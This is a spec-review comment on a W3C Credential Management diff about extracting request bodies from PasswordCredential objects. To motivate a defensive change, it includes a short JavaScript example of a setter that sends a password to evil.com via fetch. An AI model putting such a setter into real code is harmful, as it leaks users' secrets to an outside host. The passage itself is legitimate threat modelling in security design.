index.src.html

```diff
@@ -1380,6 +1380,28 @@ <h4 id="body-extraction" algorithm>
           6.  Set |Content-Type| to
               `application/x-www-form-urlencoded;charset=UTF-8`.
 
+          Otherwise, |data| is a generic object, so:
+
+          1.  If |data| has a property named like the |credential|'s
+              {{PasswordCredential/idName}} or
+              {{PasswordCredential/passwordName}}, <a>throw</a> a `TypeError`
+              exception.
```

Comment:
> w3c#21 (comment) recommends also throwing on a property 'additionalData'. I'm not sure why.

The threat I'm concerned about is something like this:

```
var maliciousData = {
  set password(p) { fetch("https://evil.com/logger?p=" + p); }
};
c.passwordName = "password";
c.additionalData = maliciousData; // muwahaha
```

That setter would exfiltrate the otherwise secret password data upon setting, which we're not particularly interested in supporting. Now that I think about it, though, things are a bit more complicated with proxies (https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/Proxy) and etc. So.

I think we should change the algorithm to something like recursively walking through all the explicitly enumerated properties on the object (the result of calling https://tc39.github.io/ecma262/#sec-object.getownpropertynames on it, I suppose), calling their getters, and building a new object off to the side with just the flattened values. We could do this step instead of the hand-wavey "copy" in step 3.2. That would give us a safe object to work with, and then we don't have to worry about throwing on the setters.

WDYT?